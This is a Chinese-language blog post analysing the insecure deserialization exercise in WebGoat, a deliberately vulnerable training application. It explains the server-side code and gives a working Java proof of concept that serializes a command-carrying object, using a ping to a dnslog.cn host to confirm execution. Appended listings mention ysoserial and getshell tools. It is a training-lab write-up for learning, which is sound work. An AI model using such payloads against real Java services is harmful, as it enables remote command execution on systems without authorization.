WebGoat JAVA反序列化漏洞源码分析

已于 2024-10-10 17:02:23 修改
阅读量1.1k 收藏 19
点赞数 14
分类专栏: Java安全 文章标签: java反序列化漏洞
于 2024-10-10 16:57:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/142826493
版权

目录

InsecureDeserializationTask.java 代码分析

反序列化漏洞知识补充

VulnerableTaskHolder类分析

poc 编写

WebGoat 靶场地址:GitHub - WebGoat/WebGoat: WebGoat is a deliberately insecure application

这里就不介绍怎么搭建了,可以参考其他文章。如下输入框输入数据,提交进行反序列化操作

发现请求路径为 "InsecureDeserialization/task",请求参数为 token

全局搜索该路径,最终定位到如下文件

InsecureDeserializationTask.java 代码分析

提取出InsecureDeserializationTask.java 的主要代码如下,从代码可以看出:

  1. 服务器接收一个 post 请求,路径为"/InsecureDeserialization/task",请求参数为 token。并且将 token 参数中的 - 字符替换为 +,_ 字符替换为 / 。可能因为在某些情况下,由于URL或文件名的限制,Base64编码中的 + 和 / 字符可能会被替换为 - 和 _,所以这里再替换回去。
  2. ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(b64token))) 含义是通过Base64解码得到字节数组,然后利用这些字节数组创建对象输入流。
  3. 最后 Object o = ois.readObject() 执行反序列化操作。当readObject()方法被调用时,Java虚拟机(JVM)会根据字节流中的信息来查找并加载相应的类,这里是VulnerableTaskHolder类。所以此时系统会寻找并加载VulnerableTaskHolder类
public class InsecureDeserializationTask extends AssignmentEndpoint {

  @PostMapping("/InsecureDeserialization/task")
  @ResponseBody
  //定义一个返回AttackResult类型对象的方法,方法名为completed
  //方法接受一个名为token的参数,该参数通过HTTP请求的查询参数(@RequestParam)获取。String类型表示这个参数是一个字符串。
  public AttackResult completed(@RequestParam String token) throws IOException {
    String b64token;
    long before;
    long after;
    int delay;
    //Base64编码通常使用A-Z, a-z, 0-9, +, / 这64个字符来表示。然而,在某些情况下,由于URL或文件名的限制,Base64编码中的 + 和 / 字符可能会被替换为 - 和 _
    //将字符串中所有的 - 字符替换为 + 字符, 将所有的 _ 字符替换为 / 字符
    b64token = token.replace('-', '+').replace('_', '/');
    //Base64.getDecoder().decode(b64token) 将 Base64 编码的字符串解码为字节数组
      // ByteArrayInputStream()创建字节输入流,以便能够以流的方式读取这些字节。
      //new ObjectInputStream 创建对象输入流
    try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(b64token))))
    {
      before = System.currentTimeMillis();         //反序列化前记录当前时间戳
        //执行反序列化,并将反序列化后的对象赋值给类型为 Object 的变量 o
        //当readObject()方法被调用时,Java虚拟机(JVM)会根据字节流中的信息来查找并加载相应的类,这里是VulnerableTaskHolder类。
      Object o = ois.readObject();
      if (!(o instanceof VulnerableTaskHolder)) {  //检查反序列化得到的对象o是否是VulnerableTaskHolder类的实例
        ...
      }
      after = System.currentTimeMillis();     //反序列化后记录当前时间戳
    } 
      ...
    //得到反序列化操作所花费的时间(以毫秒为单位,如果所耗时间在3000毫秒到7000毫秒之间则成功
    delay = (int) (after - before);
    if (delay > 7000) {
      return failed(this).build();
    }
    if (delay < 3000) {
      return failed(this).build();
    }
    return success(this).build();
  }
}

反序列化漏洞知识补充

要想将某个字节序列反序列化为对象,该对象所属的类必须已经存在于系统中,具体来说,必须能够被Java虚拟机(JVM)的类加载器所加载。即VulnerableTaskHolder类必须存在,如果存在则会加载VulnerableTaskHolder类。加载后,JVM 会创建一个该类的实例,用于接收从序列化数据中读取的字段值。

如果被反序列化的类自定义了 readObject 方法,JVM 会在反序列化过程中自动调用该方法。即如果VulnerableTaskHolder 类中存在readObject 方法,并且方法中包含了不安全代码,那么这可能会导致反序列化漏洞的发生。

VulnerableTaskHolder类分析

所以我们看下VulnerableTaskHolder类是否自定义了readObject 方法,发现不仅存在readObject 方法,而且存在命令执行函数,命令执行的参数为成员变量 taskAction。这里仅仅判断了taskAction 值是否以 ping 或者 sleep 开头。

到此,反序列化漏洞的基本条件似乎都被满足了。那如何触发漏洞了?首先需要实例化一个VulnerableTaskHolder类,将其序列化然后 base64 编码即可。其实就是如下 InsecureDeserializationTask 中反序列化的逆过程。

ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(b64token)))

poc 编写

package org.dummy.insecure.framework;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.util.Base64;

public class test {
    public static void main(String[] args) {
        try {
            //创建一个ByteArrayOutputStream实例, 用于在内存中创建一个字节数组缓冲区。这个缓冲区会随着数据的写入而自动增长。
            // 这个类的用途通常是将数据写入到一个字节数组中,而不是写入到文件或网络等外部资源中。
            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            //ObjectOutputStream将使用ByteArrayOutputStream提供的字节数组缓冲区来存储序列化的对象数据。
            //换句话说,ObjectOutputStream是负责将对象序列化为字节序列的“写手”,而ByteArrayOutputStream则是它用来存放这些字节序列的“容器”。
            ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);

            VulnerableTaskHolder taskHolder = new VulnerableTaskHolder("ping", "ping pwqqq1.dnslog.cn");
            //将taskHolder对象序列化为字节序列,并将这些字节序列写入到ObjectOutputStream所使用的ByteArrayOutputStream的字节数组缓冲区中。
            objectOutputStream.writeObject(taskHolder);
            objectOutputStream.flush(); // 确保所有数据都被写入到输出流中

            // 从缓冲区获取序列化后的字节数组
            byte[] serializedBytes = byteArrayOutputStream.toByteArray();
            // 使用 Base64 编码字节数组
            String b64token = Base64.getEncoder().encodeToString(serializedBytes);

            // 输出编码后的字符串到屏幕上
            System.out.println(b64token);

            // 关闭流
            objectOutputStream.close();
            byteArrayOutputStream.close();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

运行后得到 poc

复制,然后发送,即可进行 ping 操作,成功触发反序列化漏洞

JAVA反序列化漏洞
KHOST的博客
05-11 682
Part 1 反序列化漏洞 JAVA反序列化漏洞到底是如何产生的? 1、由于很多站点或者RMI仓库等接口处存在java反序列化功能,于是攻击者可以通过构造特定的恶意对象序列化后的流,让目标反序列化,从而达到自己的恶意预期行为,包括命令执行,甚至 getshell 等等。 2、Apache Commons Collections是开源小组Apache研发的一个 Collections 收集器框架。这个框架中有一个InvokerTransformer.java接口,实现该接口的类可以...
WebGoat JAVA反序列化漏洞分析复现_webgoat反序列化,苦熬一个月
2401_83974064的博客
04-18 467
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。该方法代码如下,首先第6行进行传参token,跟到第10行,在进行反序列化对象创建的时候,进行了base64解码并返回到ois变量。这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。
WebGoat JAVA反序列化漏洞分析复现
leah126的博客
03-09 882
该方法代码如下,首先第6行进行传参token,跟到第10行,在进行反序列化对象创建的时候,进行了base64解码并返回到ois变量。但根据上面的代码分析也得知需要在提交之后,会进行base64解码,所以需要提前加密,但是像这种序列化数据直接copy出来并加密的话。为此写了加密的小工具。进行简单分析一波之后,使用ysoserial生成序列化的payload,这里的话不做过多讲解,具体使用应该大家都会。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
一文掌握Java反序列化漏洞,从零基础到精通,收藏这篇就够了!
最新发布
leah126的博客
04-08 886
不过别慌,看完这篇文章,保证你也能玩转反序列化,成为安全界的弄潮儿!想象一下,你的程序运行了一段时间,产生了一些重要的数据,比如用户登录信息、购物车内容等等。这个漏洞曾经轰动一时,利用了Apache Commons Collections库中的一些类,构造了一个精妙的利用链,可以在目标服务器上执行任意代码。请务必遵守法律法规!方法,并且在里面执行了一些恶意代码(比如打开计算器),那么在反序列化时,就会执行你自定义的恶意代码,从而导致漏洞。方法的类,上传到服务器,让服务器进行反序列化,从而执行你的恶意代码。
代码审计之WEBGOAT 反序列化
weixin_43263451的博客
06-11 1112
反序列化这关在前端页面可以看到是提交token到后端,先看一下接口名可以看到接口名为InsecureDeserialization/task,那就后端全局搜索InsecureDeserialization/task,最终定位到InsecureDeserializationTask.java源码如下: ​ 可以看到大概就是对输入的token先base64解码然后输入到字节数组输入流中然后再接到对象输入流,并利用readObject进行反序列化操作得到对象o,然后判断该对象是否属于VulnerableTask
WebGoat8.2.2-A8不安全的反序列化
weixin_45032957的博客
12-02 670
1、概念 使用反序列化在各编程语言中略有不同,如Java、PHP、Python、Ruby、C/C++等等,但在关键概念上是一样的 序列化:将(内存中的)对象转化成数据格式,以便存储或传输 反序列化:即序列化的反过程,从某种格式的数据中构建对象 如今最受欢迎的序列化数据格式是JSON,而在这之前是XML,只有数据是序列化的,而代码本身不是 2、Native Serialization-本地序列化/客制序列化 一些编程语言提供了自己的序列化功能,所使用的数据格式比一般的JSON或XML拥有更多的特性和功能,甚至
xstream xml转对象_webgoat-常用组件安全-xml 反序列化利用
weixin_39887577的博客
12-10 225
题目要求1:题目介绍了jquery的低版本1.10.4存在xss漏洞,1.12.0中则不存在。于是让我们分别在两个框里面随便输入一点东西,尝试在第一个框里面随便输入然后点GO以后出现xss弹窗,尝试在第二个框里面输入点GO就什么事情都没有发生,依次来说明低版本的jquery不安全。看着是没啥毛病,于是我就简单的调试了一下界面。先看下1.10.4的输入框相关的代码:点GO会触发webgoat.cus...
java反序列化漏洞
2302_81785888的博客
12-19 1083
如果你想知道一个 Java 标准类是否是可序列化的,可以通过查看该类的文档,查看该类有没有实现 java.io.Serializable接口。该类的所有属性必须是可序列化的。如果有一个属性不是可序列化的,则该属性必须注明是短暂的。该类必须实现 java.io.Serializable 接口。
2024年网络安全最全WebGoat JAVA反序列化漏洞分析复现_webgoat反序列化(1),2024年最新面试题附答案
2401_84240129的博客
05-06 371
由于靶场在Linux中,所以命令改成了touch 1.txt打开之后确实是已经序列化了但根据上面的代码分析也得知需要在提交之后,会进行base64解码,所以需要提前加密,但是像这种序列化数据直接copy出来并加密的话。很有可能就跑偏了。因为其中本身就是一些字节形式。为此写了加密的小工具。之后使用工具测试一下。可以看到序列化的数据成功加密看一下当前目录,确实还不存在1.txt直接提交刚才工具加密的payload即可漏洞利用成功对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
(渗透学习)ysoserial工具使用--java反序列化漏洞利用
热门推荐
yang1234567898的博客
01-03 1万+
工具下载地址:https://github.com/angelwhu/ysoserial 使用方法可参考:https://blog.csdn.net/weixin_34275734/article/details/92243836 靶场webgoat---Insecure Deserializetion---5 分析漏洞: 题目给的数据是rO0AB开头,所以是经过了base64加密的java序列化对象。 解码后是一段英文,百度翻译也没发现有啥用处: 题目还给出了一个接收序列化数据的表单.
java反序列化
weixin_52221158的博客
08-17 888
JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI 服务供应接口(SPI)的实现,由管理者将JNDI API 映射为特定的命名服务和目录系统,使得 Java 应用程序可以和这些命名服务和目录服务直接进行交互。漏洞经常存在于一些 web组件中。例如 weblogic,Fastjson,JBoss,WebSphere,Jenkins,OpenNMS,Shiro。打开idea,看一下源码(在windows系统解压jar包,在idea创建项目查看,找到对应的jar文件,右键选择添加为库即可查看)...
Java反序列化漏洞利用工具(WebLogic&Jboss;)
10-10
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
Java代码审计漏洞挖掘(入门)
Ms08067安全实验室
11-10 4871
出品|MS08067实验室(www.ms08067.com)双十一最有意义的事情莫过于是学习一门高级渗透技术了!代码审计属于高级渗透测试服务的一环,顾名思义就是检查源代码中的安全缺陷,检查...
Java 反序列化漏洞
qq_61553520的博客
05-24 5645
在各种编程语言的反序列化漏洞中,Java是最引人瞩目的,因为Java的开发生态中各种第三方库组件相互依赖,经常出现开发中常用的基础底层组件出现安全问题时,会引发核弹式反应,进而影响到上层得操作系统。
Java反序列化漏洞
MRS_jianai的博客
02-19 814
Java反序列化源码复现
反序列化漏洞-JAVA
acepanhuan的博客
02-22 735
反序列化漏洞-JAVA
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值